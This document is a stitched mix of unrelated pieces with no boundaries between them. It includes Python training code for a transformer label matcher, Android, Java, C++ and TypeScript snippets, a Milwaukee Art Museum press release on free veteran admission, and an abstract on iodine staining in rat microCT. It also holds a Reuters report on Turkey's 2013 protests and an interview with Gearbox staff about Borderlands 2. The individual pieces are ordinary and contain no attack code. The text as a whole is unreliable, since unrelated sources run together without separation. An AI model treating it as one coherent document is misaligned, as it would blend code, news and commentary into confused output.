train_params.num_train_epochs = train_params.max_steps // steps_per_epoch + 1 else: steps_per_epoch = len(train_dataloader) // train_params.gradient_accumulation_steps t_total = steps_per_epoch * train_params.num_train_epochs # Prepare 
optimizer, disable weight decay for bias and layernorm weights no_decay = ["bias", "LayerNorm.weight"] optimizer_grouped_parameters = [ { "params": [ p for n, p in self.text_encoder.named_parameters() if not any(nd in n for nd in no_decay) ], "weight_decay": train_params.weight_decay, }, { "params": [ p for n, p in self.text_encoder.named_parameters() if any(nd in n for nd in no_decay) ], "weight_decay": 0.0, }, ] optimizer = AdamW( optimizer_grouped_parameters, lr=train_params.learning_rate, eps=train_params.adam_epsilon, ) scheduler = get_scheduler( train_params.lr_schedule, optimizer, num_warmup_steps=train_params.warmup_steps, num_training_steps=t_total, ) sparse_parameters = list(self.text_model.parameters()) if prob.M is not None: emb_optimizer = torch.optim.SparseAdam( sparse_parameters, lr=train_params.learning_rate, eps=train_params.adam_epsilon, ) else: # For the top matcher treat text_model as dense layer emb_optimizer = AdamW( sparse_parameters, lr=train_params.learning_rate, eps=train_params.adam_epsilon, ) emb_scheduler = get_scheduler( train_params.lr_schedule, emb_optimizer, num_warmup_steps=train_params.warmup_steps, num_training_steps=t_total, ) # Start Batch Training LOGGER.info("***** Running training *****") LOGGER.info(" Num examples = %d", prob.X_text["input_ids"].shape[0]) LOGGER.info(" Num labels = %d", self.nr_labels) if prob.M is not None: LOGGER.info(" Num active labels per instance = %d", label_indices_pt.shape[1]) LOGGER.info(" Num Epochs = %d", train_params.num_train_epochs) LOGGER.info(" Learning Rate Schedule = %s", train_params.lr_schedule) LOGGER.info(" Batch size = %d", train_params.batch_size) LOGGER.info(" Gradient Accumulation steps = %d", train_params.gradient_accumulation_steps) LOGGER.info(" Total optimization steps = %d", t_total) global_step = 0 tr_loss, logging_loss = 0.0, 0.0 total_train_time, logging_elapsed = 0.0, 0.0 best_matcher_prec = -1 avg_matcher_prec = 0 save_cur_model = False no_improve_cnt = 0 self.text_encoder.zero_grad() self.text_model.zero_grad() for epoch in range(1, int(train_params.num_train_epochs) + 1): if do_resample and epoch > 1: # redo subsample negative labels label_indices_pt, label_values_pt = TransformerMatcher._get_label_tensors( M_next, prob.Y, idx_padding=self.text_model.label_pad, max_labels=train_params.max_active_matching_labels, ) train_data.refresh_labels( label_values=label_values_pt, label_indices=label_indices_pt, ) for batch_cnt, batch in enumerate(train_dataloader): self.text_encoder.train() self.text_model.train() start_time = time.time() batch = tuple(t.to(self.device) for t in batch) inputs = { "input_ids": batch[0], "attention_mask": batch[1], "token_type_ids": batch[2], "instance_number": batch[3], "label_values": batch[4], "label_indices": batch[-1] if prob.M is not None else None, } text_model_W_seq, text_model_b_seq = self.text_model( output_indices=inputs["label_indices"], num_device=len(self.text_encoder.device_ids) if hasattr(self.text_encoder, "device_ids") else 1, ) outputs = self.text_encoder( input_ids=inputs["input_ids"], attention_mask=inputs["attention_mask"], token_type_ids=inputs["token_type_ids"], label_embedding=(text_model_W_seq, text_model_b_seq), ) loss = loss_function(outputs["logits"], inputs["label_values"].to(self.device)) loss = loss.mean() # mean() to average on multi-gpu parallel training if train_params.gradient_accumulation_steps > 1: loss = loss / train_params.gradient_accumulation_steps loss.backward() tr_loss += loss.item() logging_elapsed += time.time() - start_time 
total_train_time += time.time() - start_time if (batch_cnt + 1) % train_params.gradient_accumulation_steps == 0: torch.nn.utils.clip_grad_norm_( self.text_encoder.parameters(), train_params.max_grad_norm ) optimizer.step() # perform gradient update scheduler.step() # update learning rate schedule optimizer.zero_grad() # clear gradient accumulation torch.nn.utils.clip_grad_norm_( self.text_model.parameters(), train_params.max_grad_norm ) emb_optimizer.step() # perform gradient update emb_scheduler.step() # update learning rate schedule emb_optimizer.zero_grad() # clear gradient accumulation global_step += 1 if logging_steps > 0 and global_step % logging_steps == 0: cur_loss = (tr_loss - logging_loss) / logging_steps LOGGER.info( "| [{:4d}/{:4d}][{:6d}/{:6d}] | {:4d}/{:4d} batches | ms/batch {:5.4f} | train_loss {:6e} | lr {:.6e}".format( int(epoch), int(train_params.num_train_epochs), int(global_step), int(t_total), int(batch_cnt), len(train_dataloader), logging_elapsed * 1000.0 / logging_steps, cur_loss, scheduler.get_last_lr()[0], ) ) logging_loss = tr_loss logging_elapsed = 0 if train_params.save_steps > 0 and global_step % train_params.save_steps == 0: if val_prob is not None: if val_prob.M is None: test_combos = zip(["all"], [None]) else: test_combos = zip( ["trn_ns", "pred_ns"], [val_prob.M, val_csr_codes] ) for val_type, valid_M in test_combos: avr_beam = 1 if valid_M is None else valid_M.nnz / valid_M.shape[0] # compute loss and prediction on test set val_pred, _ = self.predict( val_prob.X_text, csr_codes=valid_M, batch_size=train_params.batch_size, batch_gen_workers=train_params.batch_gen_workers, pred_params={"ensemble_method": "transformer-only"}, ) LOGGER.info("-" * 89) LOGGER.info( "| epoch {:3d} step {:6d} evaluation | training-time: {:5.4f}s average-beam: {:5.1f}".format( epoch, global_step, total_train_time, avr_beam, ) ) # compute precision on test set val_metrics = smat_util.Metrics.generate( val_prob.Y, val_pred, topk=pred_params.only_topk, ) LOGGER.info( "| {} test-prec {}".format( val_type, " ".join( "{:4.2f}".format(100 * v) for v in val_metrics.prec ), ) ) LOGGER.info( "| {} test-recl {}".format( val_type, " ".join( "{:4.2f}".format(100 * v) for v in val_metrics.recall ), ) ) avg_matcher_prec = np.mean(val_metrics.prec) # save the model with highest val precision save_cur_model = avg_matcher_prec > best_matcher_prec else: # if val set not given, always save save_cur_model = True if save_cur_model: no_improve_cnt = 0 LOGGER.info( "| **** saving model (avg_prec={}) to {} at global_step {} ****".format( 100 * avg_matcher_prec, train_params.model_dir, global_step, ) ) best_matcher_prec = avg_matcher_prec self.save(train_params.model_dir) else: no_improve_cnt += 1 LOGGER.info("-" * 89) if (max_steps > 0 and global_step > max_steps) or ( max_no_improve_cnt > 0 and no_improve_cnt >= max_no_improve_cnt ): break if (max_steps > 0 and global_step > max_steps) or ( max_no_improve_cnt > 0 and no_improve_cnt >= max_no_improve_cnt ): break return self @classmethod def train( cls, prob, csr_codes=None, val_prob=None, val_csr_codes=None, train_params=None, pred_params=None, **kwargs, ): """Train the transformer matcher Args: prob (MLProblemWithText): training problem csr_codes (csr_matrix, optional): prediction matrix, shape = (nr_inst, nr_codes) its values and indices will be used in combiner for next prediction val_prob (MLProblemWithText, optional): validation problem val_csr_codes (csr_matrix, optional): prediction matrix for validation data, shape = (nr_val_inst, nr_codes) its 
values and indices will be used in combiner for next prediction train_params (TransformerMatcher.TrainParams, optional): instance of TransformerMatcher.TrainParams. pred_params (TransformerMatcher.PredParams, optional): instance of TransformerMatcher.PredParams. kwargs: bootstrapping (tuple): (init_encoder, init_embeddings) the text_encoder and corresponding instance embeddings generated by it. Used for bootstrap current text_encoder and text_model. Default None to ignore return_dict (bool): if True, return a dictionary with model and its prediction/embeddings on train/validation dataset. Default False. Returns: results (TransformerMatcher or dict): if return_dict=True, return a dictionary: { matcher: TransformerMatcher instance trn_pred (csr_matrix): topk prediction on training data, shape = (nr_inst, nr_labels) val_pred (csr_matrix or None): topk prediction on validation data, shape = (nr_val_inst, nr_labels) trn_embeddings (ndarray): instance embedding on training data, shape = (nr_inst, hidden_dim). val_embeddings (ndarray or None): instance embedding on validation data, shape = (nr_val_inst, hidden_dim). } otherwise return the trained TransformerMatcher instance """ train_params = cls.TrainParams.from_dict(train_params) pred_params = cls.PredParams.from_dict(pred_params) LOGGER.debug(f"TransformerMatcher train_params: {train_params.to_dict()}") LOGGER.debug(f"TransformerMatcher pred_params: {pred_params.to_dict()}") # save to a temp dir if not given if not train_params.model_dir: temp_dir = tempfile.TemporaryDirectory() train_params.model_dir = temp_dir.name if train_params.init_model_dir: matcher = cls.load(train_params.init_model_dir) if prob.Y.shape[1] != matcher.nr_labels: LOGGER.warning( f"Got mismatch nr_labels (expected {prob.Y.shape[1]} but got {matcher.nr_labels}), text_model reinitialized!" 
) matcher.text_model = TransformerLinearXMCHead( matcher.text_encoder.config.hidden_size, prob.Y.shape[1] ) matcher.text_encoder.config.num_labels = prob.Y.shape[1] else: matcher = cls.download_model( train_params.model_shortcut, prob.Y.shape[1], hidden_dropout_prob=train_params.hidden_dropout_prob, cache_dir=train_params.cache_dir, ) LOGGER.info("Downloaded {} model from s3.".format(train_params.model_shortcut)) # assign clusters and train/pred params matcher.C = prob.C matcher.train_params = train_params matcher.pred_params = pred_params # tokenize X_text if X_text is given as raw text saved_trn_pt = train_params.saved_trn_pt if not prob.is_tokenized: if saved_trn_pt and os.path.isfile(saved_trn_pt): trn_tensors = torch.load(saved_trn_pt) LOGGER.info("trn tensors loaded_from {}".format(saved_trn_pt)) else: trn_tensors = matcher.text_to_tensor( prob.X_text, num_workers=train_params.batch_gen_workers, max_length=pred_params.truncate_length, ) if saved_trn_pt: torch.save(trn_tensors, saved_trn_pt) LOGGER.info("trn tensors saved to {}".format(saved_trn_pt)) prob.X_text = trn_tensors if val_prob is not None and not val_prob.is_tokenized: saved_val_pt = train_params.saved_val_pt if saved_val_pt and os.path.isfile(saved_val_pt): val_tensors = torch.load(saved_val_pt) LOGGER.info("val tensors loaded from {}".format(saved_val_pt)) else: val_tensors = matcher.text_to_tensor( val_prob.X_text, num_workers=train_params.batch_gen_workers, max_length=pred_params.truncate_length, ) if saved_val_pt: torch.save(val_tensors, saved_val_pt) LOGGER.info("val tensors saved to {}".format(saved_val_pt)) val_prob.X_text = val_tensors bootstrapping = kwargs.get("bootstrapping", None) if train_params.bootstrap_method is not None and bootstrapping is not None: init_encoder, init_embeddings, prev_head = bootstrapping matcher.text_encoder.init_from(init_encoder) LOGGER.info("Initialized transformer text_encoder form given text_encoder!") if train_params.bootstrap_method == "linear" and init_embeddings is not None: bootstrap_prob = MLProblem( init_embeddings, prob.Y, C=prob.C if prob.M is not None else None, M=prob.M, R=prob.Y if "weighted" in train_params.loss_function else None, ) matcher.text_model.bootstrap(bootstrap_prob) LOGGER.info("Initialized transformer text_model with xlinear!") elif train_params.bootstrap_method == "inherit": matcher.text_model.inherit(prev_head, prob.C) LOGGER.info("Initialized transformer text_model form parent layer!") # move matcher to desired hardware device, n_gpu = torch_util.setup_device(not train_params.disable_gpu) matcher.to_device(device, n_gpu) train_params.batch_size *= max(1, n_gpu) # train the matcher if not train_params.no_fine_tune and ( train_params.max_steps > 0 or train_params.num_train_epochs > 0 ): LOGGER.info("Start fine-tuning transformer matcher...") matcher.fine_tune_encoder(prob, val_prob=val_prob, val_csr_codes=val_csr_codes) if os.path.exists(train_params.model_dir): LOGGER.info("Reload the best checkpoint from {}".format(train_params.model_dir)) matcher = TransformerMatcher.load(train_params.model_dir) matcher.to_device(device, n_gpu) # ignore concat_model even if there exist one matcher.concat_model = None # getting the instance embeddings of training data # since X_feat is not passed, transformer-only result is produced P_trn, inst_embeddings = matcher.predict( prob.X_text, csr_codes=csr_codes, pred_params=pred_params, batch_size=train_params.batch_size, batch_gen_workers=train_params.batch_gen_workers, ) if pred_params.ensemble_method not in 
["transformer-only"]: # train the same layer concat_model with current embedding LOGGER.info("Concatenating instance embeddings with features...") normed_embeddings = sk_normalize(inst_embeddings, axis=1, copy=True) if isinstance(prob.X, smat.csr_matrix): normed_embeddings = smat_util.dense_to_csr(normed_embeddings) cat_embeddings = smat_util.hstack_csr([prob.X, normed_embeddings], dtype=np.float32) else: cat_embeddings = np.hstack([prob.X, normed_embeddings]) LOGGER.info("Start training concat_model of transformer matcher...") lprob = MLProblem( cat_embeddings, prob.Y, C=prob.C if prob.M is not None else None, M=prob.M, R=sk_normalize(prob.Y, norm="l1") if "weighted" in train_params.loss_function else None, ) matcher.concat_model = MLModel.train(lprob, threshold=train_params.threshold) matcher.save(train_params.model_dir) # P_trn with concat_model concat_P_trn = matcher.concat_model.predict( lprob.X, csr_codes=csr_codes, only_topk=pred_params.only_topk, post_processor=pred_params.post_processor, ) P_trn = TransformerMatcher.ensemble_prediction( P_trn, concat_P_trn, pred_params.only_topk, pred_params.ensemble_method, ) P_val, val_inst_embeddings = None, None if val_prob is not None: P_val, val_inst_embeddings = matcher.predict( val_prob.X_text, X_feat=val_prob.X, csr_codes=val_csr_codes, batch_size=train_params.batch_size, batch_gen_workers=train_params.batch_gen_workers, ) LOGGER.info("*************** Final Evaluation ***************") # compute precision on test set val_type = "man" if val_csr_codes is not None else "all" val_metrics = smat_util.Metrics.generate(val_prob.Y, P_val, topk=pred_params.only_topk) avr_val_beam = ( 1 if val_csr_codes is None else val_csr_codes.nnz / val_csr_codes.shape[0] ) LOGGER.debug("avr_beam={}".format(avr_val_beam)) LOGGER.info( "| {} test-prec {}".format( val_type, " ".join("{:4.2f}".format(100 * v) for v in val_metrics.prec), ) ) LOGGER.info( "| {} test-recl {}".format( val_type, " ".join("{:4.2f}".format(100 * v) for v in val_metrics.recall), ) ) LOGGER.info("*" * 72) if train_params.save_emb_dir: smat_util.save_matrix( os.path.join(train_params.save_emb_dir, "X.trn.npy"), inst_embeddings, ) if val_inst_embeddings is not None: smat_util.save_matrix( os.path.join(train_params.save_emb_dir, "X.val.npy"), val_inst_embeddings, ) LOGGER.info(f"Instance embeddings saved to {train_params.save_emb_dir}") matcher.clear_cuda() if kwargs.get("return_dict", False): return { "matcher": matcher, "trn_pred": P_trn, "val_pred": P_val, "trn_embeddings": inst_embeddings, "val_embeddings": val_inst_embeddings, } else: return matcher
def _read_file(cls, path, filter_n_rx=True):
    my_reader = IWLBeamformReader()
    csi_data = my_reader.read_file(path)
    if filter_n_rx:
        csi_entries = [frame for frame in csi_data.frames if frame.n_rx == 3]
    else:
        csi_entries = csi_data.frames
    return csi_entries
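# A brief usage sketch, assuming this helper is a classmethod on some loader
# class (CsiLoader below is hypothetical) and that IWLBeamformReader comes
# from a CSI parsing library such as CSIKit; the file path is illustrative:
#
#   frames = CsiLoader._read_file("data/capture.dat", filter_n_rx=True)
#   print(len(frames), "frames with 3 receive antennas")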
Free Museum Admission for Veterans, Active Military, and Family Members FREE MUSEUM ADMISSION FOR VETERANS, ACTIVE MILITARY BEGINS ON MEMORIAL DAY Veterans, Active Military free all summer long Milwaukee, Wis. – The Milwaukee Art Museum is offering free admission for all veterans, active military, and up to five additional family members beginning on Monday, May 27 (Memorial Day) and running through Monday, September 2 (Labor Day). Currently on view is The Veterans Book Project: Objects for Deployment, which highlights the stories of veterans from throughout the country, including five local veterans and their families. In continuing the Museum’s partnership with the Milwaukee County War Memorial, all veterans and up to five family members with them receive free admission throughout the run of the exhibition. This summer, the Museum is again participating in the Blue Star Museums program, where active military and up to five family members with them receive free Museum admission from Memorial Day through Labor Day. First launched in 2010, Blue Star Museums is a collaboration among the National Endowment for the Arts, Blue Star Families, the Department of Defense, and more than 2,000 museums across America. Starting Memorial Day (May 27) and running through Labor Day (Sept 2), the Museum is open seven days a week, 10 a.m. to 5 p.m. (until 8 p.m. on Thursdays). The Museum’s summer feature exhibition, 30 Americans, opens June 14. ABOUT MILWAUKEE ART MUSEUM Celebrating its 125th anniversary in 2013, the Milwaukee Art Museum houses a rich collection of over 30,000 works, with strengths in 19th- and 20th-century American and European art, contemporary art, American decorative arts, and folk and self-taught art. The Museum campus is located on the shores of Lake Michigan and spans three buildings, including the Santiago Calatrava-designed Quadracci Pavilion and the Eero Saarinen-designed Milwaukee County War Memorial Center. For more information, please visit www.mam.org. ###
/** Bind to the Events Manager Service */ private void bindToEventsManagerService() { Log.d(LOG_TAG, "Binding to Events Manager Service..."); Intent serviceIntent = new Intent(SERVICE_ACTION); bindService(serviceIntent, serviceConnection, Context.BIND_AUTO_CREATE); }
package com.whoiszxl.wallet.base.dao;

import com.whoiszxl.wallet.base.pojo.ZxlUserAddress;
import org.springframework.data.jpa.repository.JpaRepository;
import org.springframework.data.jpa.repository.JpaSpecificationExecutor;

/**
 * @description: user address DAO layer
 * @author: whoiszxl
 * @create: 2019-08-16
 **/
public interface UserAddressDao extends JpaRepository<ZxlUserAddress, String>, JpaSpecificationExecutor<ZxlUserAddress> {

    ZxlUserAddress findByUserIdAndCurrencyIdAndStatus(String userId, Integer currencyId, Integer status);

    ZxlUserAddress findByCurrencyIdAndRechargeAddressAndStatus(Integer currencyId, String rechargeAddress, Integer status);
}
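/*
 * A minimal usage sketch of this Spring Data repository inside a service;
 * the service class and the status constant are hypothetical:
 *
 *   @Service
 *   public class UserAddressService {
 *       @Autowired
 *       private UserAddressDao userAddressDao;
 *
 *       public ZxlUserAddress findActiveAddress(String userId, Integer currencyId) {
 *           // status = 1 is assumed here to mean "active"
 *           return userAddressDao.findByUserIdAndCurrencyIdAndStatus(userId, currencyId, 1);
 *       }
 *   }
 */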
#pragma once #include <QJsonObject> #include <memory> #include <game/board/field.h> class FieldFactory { FieldFactory() = delete; public: static std::unique_ptr<Field> create(const QJsonObject& specification); protected: static std::unique_ptr<Field> createStreet(const QJsonObject& specification); static std::unique_ptr<Field> createUtility(const QJsonObject& specification); };
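// A possible shape for the corresponding .cpp, assuming the JSON specification
// carries a "type" discriminator ("street"/"utility" are assumed key values;
// the real field names may differ):
//
//   std::unique_ptr<Field> FieldFactory::create(const QJsonObject& specification) {
//       const QString type = specification.value("type").toString();
//       if (type == "street")
//           return createStreet(specification);
//       if (type == "utility")
//           return createUtility(specification);
//       return nullptr;  // unknown field type
//   }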
//! Probability of at least N events
class ProbabilityOfAtLeastNEvents {
  public:
    explicit ProbabilityOfAtLeastNEvents(Size n) : n_(n) {}
    Real operator()(std::vector<Real> p) const;

  private:
    Size n_;
};
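// A minimal sketch of how operator() could be implemented, assuming the events
// are independent with marginal probabilities p (illustrative only, not
// necessarily the library's actual definition):
//
//   Real ProbabilityOfAtLeastNEvents::operator()(std::vector<Real> p) const {
//       // dist[k] = probability that exactly k of the events seen so far occur
//       std::vector<Real> dist(p.size() + 1, 0.0);
//       dist[0] = 1.0;
//       for (std::size_t i = 0; i < p.size(); ++i) {
//           for (std::size_t k = i + 1; k >= 1; --k)
//               dist[k] = dist[k] * (1.0 - p[i]) + dist[k - 1] * p[i];
//           dist[0] *= (1.0 - p[i]);
//       }
//       Real result = 0.0;
//       for (std::size_t k = n_; k <= p.size(); ++k)
//           result += dist[k];
//       return result;
//   }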
import * as React from "react";
import * as ReactDOM from "react-dom";
import InputPlayers from "./pages/input_players";
import ChooseCard from "./pages/choose_card";
import Challenge from "./pages/challenge";
import Result from "./pages/result";
import initState from "./state";

const Index = () => {
  const [state, setState] = React.useState(initState);
  if (state.mode === "inputPlayers") {
    return <InputPlayers state={state} setState={setState} />;
  } else if (state.mode === "chooseCard") {
    return <ChooseCard state={state} setState={setState} />;
  } else if (state.mode === "challenge") {
    return <Challenge state={state} setState={setState} />;
  } else if (state.mode === "result") {
    return <Result state={state} />;
  } else {
    return <h1>internal server error</h1>;
  }
};

ReactDOM.render(<Index />, document.getElementById("react"));
import { State, Action, StateContext } from '@ngxs/store';
import { Reminder } from 'src/app/_shared/models/reminder';
import { SelectDay, SelectReminder } from './actions';

export interface DateModel {
  day: Date;
}

export interface ReminderModel {
  reminder: Reminder;
}

@State<DateModel>({
  name: 'day',
  defaults: {
    day: null
  }
})
export class DayState {
  @Action(SelectDay)
  setDay(ctx: StateContext<DateModel>, action: SelectDay) {
    const state = ctx.getState();
    ctx.setState({
      ...state,
      day: action.day
    });
  }
}

@State<ReminderModel>({
  name: 'reminder',
  defaults: {
    reminder: null
  }
})
export class EventState {
  @Action(SelectReminder)
  setReminder(ctx: StateContext<ReminderModel>, action: SelectReminder) {
    const state = ctx.getState();
    ctx.setState({
      ...state,
      reminder: action.reminder
    });
  }
}
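// A short usage sketch: dispatching the actions handled above from a component.
// The Store injection and action payloads are assumptions based on the handlers:
//
//   import { Store } from '@ngxs/store';
//
//   constructor(private store: Store) {}
//
//   pickDay(day: Date) {
//     this.store.dispatch(new SelectDay(day));
//   }
//
//   pickReminder(reminder: Reminder) {
//     this.store.dispatch(new SelectReminder(reminder));
//   }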
Using different iodine staining for morphological analysis of muscle structure in Wistar rats from microCT images

The aim of this study was to evaluate the effect of concentration and staining duration of iodine contrast applied to study the masticatory muscles of Wistar rats in microCT images. The iodine contrast was applied at concentrations of 3%, 5%, and 10%, for 7, 15, and 30 days. In general, the 10% contrast presented the best results.
ISTANBUL/ANKARA (Reuters) - Turkish demonstrators demanded the sacking of police chiefs on Wednesday over a fierce crackdown on days of unprecedented protest against what they see as Prime Minister Tayyip Erdogan’s authoritarian rule.

A delegation of activists met Deputy Prime Minister Bulent Arinc at his office in Ankara and demanded the release of detained demonstrators, a halt to the police use of tear gas, and the removal of senior officers who oversaw the crackdown.

Arinc, formally in charge of government while Erdogan is on an official visit to North Africa, has apologized for “excessive violence” by police against the initial protest in Istanbul’s Taksim Square but made no public comment after the meeting.

Police use of tear gas and water cannon to disperse that initial demonstration last week triggered the most violent riots in decades and drew other groups, from professionals to students, into a broadening protest against Erdogan. Two people have been killed and more than 3,000 injured in the six days of unrest, dealing a blow to the prime minister’s image at home and abroad.

Members of more than a dozen labor unions banging drums, trailing banners and chanting “Tayyip resign” marched into Taksim, where the demonstrations have been largely peaceful in recent days after riot police withdrew. There were similar scenes in Kizilay park, the heart of Ankara’s government district, where police fired pepper spray and water cannons in a bid to disperse around 2,000 protesters.

Critics accuse Erdogan of inflaming the situation over the weekend by describing protesters in blanket terms as looters, and later associating them with terrorism. Since Erdogan left on Monday, Arinc has struck a more conciliatory tone.

But Arinc refuses to talk to unnamed groups he accuses of exploiting anger over the police action against the original protest to foment violence. Youths, some affiliated to radical left wing groups, have pulled up paving stones and smashed windows in successive nights.

The softening in tone from the AK Party (AKP) government appeared too little and too late to halt the protests. “We will show that we will not surrender to AKP fascism with our peaceful democratic reaction in city squares,” said a joint statement from two union confederations. “The AKP is trying to cow a significant portion of society to realize its own dreams of power, restricting rights and freedoms.”

U.S. CONCERN

Erdogan, who has a huge parliamentary majority, did not comment on domestic matters at a news conference in Algiers on Tuesday. A man who rarely bows to any opposition, he clearly has no intention of stepping down and no obvious rivals inside or outside his AK party.

U.S. Vice President Joe Biden, reflecting concern about stability in a NATO ally in the Middle East, urged the Turkish government to respect the rights of political opponents. “Today’s Turkey has a chance to demonstrate that there’s no need to choose between economic advancement and democracy, the system that empowers the winners of elections and yet protects those who are in opposition,” Biden said.

A Turkish diplomatic source said Foreign Minister Ahmet Davutoglu called U.S. Secretary of State John Kerry on Wednesday, telling him Turkey was not a second-class democracy and referring to the Occupy Wall Street protests of 2011, when New York police raided a park to flush out campaigners.
The United States has held up Erdogan’s Turkey as an example of an Islamic democracy that could be imitated throughout the Middle East. But domestic opponents argue that, for all the economic advances under Erdogan and early democratic reform, events have recently taken a more authoritarian turn.

They also accuse him of pursuing an “Islamist” agenda by easing restrictions on the wearing of headscarves - a symbol of female Islamic piety - in state institutions, limiting alcohol sales and promoting broader religious projects. Erdogan denies any ambition to undermine Turkey’s secular constitution.

Hackers calling themselves “Anonymous Turkey” said they had attacked government systems and obtained confidential details of staff in Erdogan’s office. A source in the prime ministry confirmed staff email accounts had come under a “phishing” attack to obtain confidential details but said those affected had been cut off from the network.

On Taksim, thousands remained at a makeshift camp that is taking on the look of a more enduring settlement. Small tents have appeared, food and face masks against tear gas are on sale and a library is in the making. On a street off the square some protesters skirmished overnight with police who used tear gas.

ERDOGAN’S POWER

Erdogan’s return on Thursday to Turkey, a country laden with political tensions on its borders with both Syria and Iraq, could prove pivotal to the unrest. “The main concern for the moment is that the prime minister should hold his silence,” said one diplomat close to the administration. “Whatever he says seems to stir feelings.”

In the western port city of Izmir, police raided 38 addresses and detained 25 people on suspicion of stirring insurrection on social media with comments on the protest, opposition CHP party deputy Alaattin Yuksel told Reuters. Police declined comment.

In a television interview this week, Erdogan described social media, including Twitter, as a “scourge”. But social media have taken on a particular importance as newspapers and television have come increasingly under the sway of government.

Clashes spread overnight to the eastern province of Tunceli, where police fired tear gas and water cannon at hundreds of protesters who set up barricades and threw stones at them, witnesses said. Police intervened in a similar way against demonstrators in Ankara, as well as in Hatay province on the Syrian border where a 22-year-old man died after being hit in the head at a rally late on Monday.
For those familiar with the original Borderlands, arguably the one character that has the most iconic and lasting appeal is that of Claptrap, the robot—or robots—that populate the landscape of Pandora (Search your feelings Lilith fans, you know it to be true). They were there to offer quests, lead you to hidden items, and offer a bit of comic relief–before they decide to eliminate all of us puny human meat sacks in the DLC “Claptrap’s New Robot Revolution,” of course, but even then they tended to entertain while they ate organic justice and exploded with a satisfying “boom.”

When the original Borderlands was released in 2009, many had high hopes for it, but few expected it to explode the way it did. Within the first two months of its release, the game had sold 2 million copies–a number that would classify it as a success. Two months later, it had sold another million, cementing it as a true hit. At last count, the game had recorded 4.5 million in sales, making it somewhat elite. So a sequel was not only welcome, but expected. And while the original game snuck up and surprised almost everyone (except maybe the developers Gearbox Software and publisher 2K Games), the sequel has some high expectations when it does NOT come out on July 20 (more on that later).

When it does hit shelves, the game will feature several new upgrades, improvements, and a much bigger role for the sole remaining Claptrap. We talked with Gearbox President & CEO Randy Pitchford, Executive VP & Chief Creative Officer Brian Martel, Borderlands 2 Writer Anthony Burch, and Producer Matt Charles about what to expect from Claptrap, how the development between the original and sequel has changed, and how the industry as a whole is looking from Gearbox’s side of the fence.

What can we expect from the Claptraps in Borderlands 2?

[Anthony Burch, writer] You can expect all but one of them to be dead, for starters. The game opens with Claptrap – the very first one you met in BL1 – in the unenviable position of being the last of his kind. The Hyperion Corporation ordered the extermination of the entire CL4P-TP product line, and our Claptrap is hungry for revenge against his creators. He’s kind of like Rutger Hauer’s character in Blade Runner, only minus the bleached blonde hair, moral ambiguity, and sex appeal.

How will the events of the “Robot Revolution” DLC shade the story of Borderlands 2?

[AB] You won’t need to have played the Robot Revolution DLC to understand Claptrap’s place in Borderlands 2, but it certainly doesn’t hurt. Hyperion ordered the extermination of the CL4P-TP line as an answer to the events of the robot revolution. That, and because Handsome Jack, the head of Hyperion, thinks dancing robots are a waste of money.

What was the inspiration for the design of the Claptrap units?

[Brian Martel] Claptrap actually originated from one of our tasks in another title we were developing. One of our concept artists, Lorin Wood, posted a quick sketch of him in the task as a joke. We thought it would be awesome to have a one wheel talking robot in Borderlands and he riffed on the concept some more and out came our funny talking robot!

Growing up, what were some of your favorite robots in fiction, and why?

[AB] I loved the robot from Lost in Space. The, uh, movie. The one with Matt LeBlanc as a badass space pilot. May I one day be forgiven.

Do you follow real world robotics? How do you see the health of that industry?

[BM] We occasionally do. We always make an effort to stay up to date on technology of all varieties.
Sometimes we use that technology as inspiration for art within our own titles. We do hope the robotic industry takes off. Who doesn’t want to have their breakfast made by a personal robot every morning?!?!

Can we expect to see Claptrap as an ally in combat?

[AB] I’m going to reinterpret your question slightly and assume that by “friendly AI who helps you out in combat,” you meant, “amusing but ultimately powerless sidekick who praises your combat performance with his characteristically endearing and/or annoying cadence.” In which case: yes. We totally have that.

How has the AI design changed from the original game to the sequel?

[AB] Like pretty much everything else in the game, the AI has undergone a massive improvement since the first game. Enemies now have much more complex interactions with one another. Our robotic enemies will heal one another, players can trick our bandit enemies into fighting amongst themselves, and our elemental creatures are off the chizzo, for rizzo. Like, say you’re fighting a Fire Skag. He’s immune to fire damage, shoots fire at you, the whole deal. But midway during your fight, some non-elemental Skag Pups come in to help him. Suddenly, the Fire Skag roars, sending out a fiery AoE blast that transforms all of the Skag Pups into Fire Skag Pups, with the same elemental strengths he had.

Any news on a firm release date? Is the tentative date of July 30 looking good?

[Matt Charles] We haven’t announced a ‘tentative’ date. Nice try, though. :) [Worth a try…]

What are the things you are most excited for people to see and experience when they play Borderlands 2?

[AB] In short: the guns. With the entire gun system rebuilt from the ground up, I’m really interested to see which guns the fans respond to — will they prefer the bullet hose Vladofs? The precise, sci-fi Hyperion weapons? The Tediore guns, which you throw like grenades instead of reloading? Personally, I can’t wait to see someone kill the endboss just by throwing Tediore reloads at it.

What games have influenced your style as a developer? What about as a fan of playing games?

[AB] Personally, as a writer? Everything by Valve Software or Irrational Games. Those guys know exactly how to successfully tell linear stories that respect the player’s agency and immersion.

How do you see the health of the gaming industry in general?

[Randy Pitchford] In sum, the game industry is stronger than ever. The best of the premium game makers are reaching more people than ever before and entirely new markets have opened up with casual games, digital distribution and mobile gaming over the last few years and all of this adds up to a very exciting climate for creators.

Where do you see the industry going in the next few years/decades?

[RP] It’s really exciting how technology is not only enabling us to deliver better looking and more immersive experiences, but more connected and convenient experiences as well. I expect we’ll continue to see growth in premium games for the major consoles especially as new console platforms appear.

Do you think the industry is starting to get the mainstream respect it deserves, or is it still a bit niche?

[RP] Games are definitely mainstream at this point. There are still one or two generations of non-gamers behind us, but everyone coming in – the people that are in front of future culture – are all gamers. To us, gaming isn’t niche or mainstream, it’s an entertainment option as relevant as or even more relevant than music, film, television or print.
#pragma once #include "./Marquardt1.hpp" #include "./Marquardt2.hpp"
def _on_train_end(self): self.train_end = timeit.default_timer() print('Training took {} seconds'.format(self.train_end - self.train_start))
/********************************************************** * 500 page. * * @author <NAME> <<EMAIL>> * @version 1.0.0 * * Copyright (C) 2021 hello-slide **********************************************************/ import Title from '../components/common/Title'; import InternalServerErrorPage from '../components/error/InternalServerErrorPage'; const InternalServerError = () => { return ( <> <Title title="500" /> <InternalServerErrorPage /> </> ); }; export default InternalServerError;
/**
 *
 * @author Robert Gruendler <[email protected]>
 *
 */
@SuppressWarnings("restriction")
public class PackagistItem extends AbstractDiscoveryItem<PackageFilterItem> {

    private MinimalPackage item;
    private Label nameLabel;
    private Label description;
    private Button downloadButton;
    private final PackageFilterItem filterItem;
    private Button favorButton;
    private Combo versionCombo;
    private boolean isLoadingVersions = false;
    private List<PackageFilterChangedListener> listeners = new ArrayList<PackageFilterChangedListener>();

    public PackagistItem(Composite parent, int style, DiscoveryResources resources, PackageFilterItem element) {
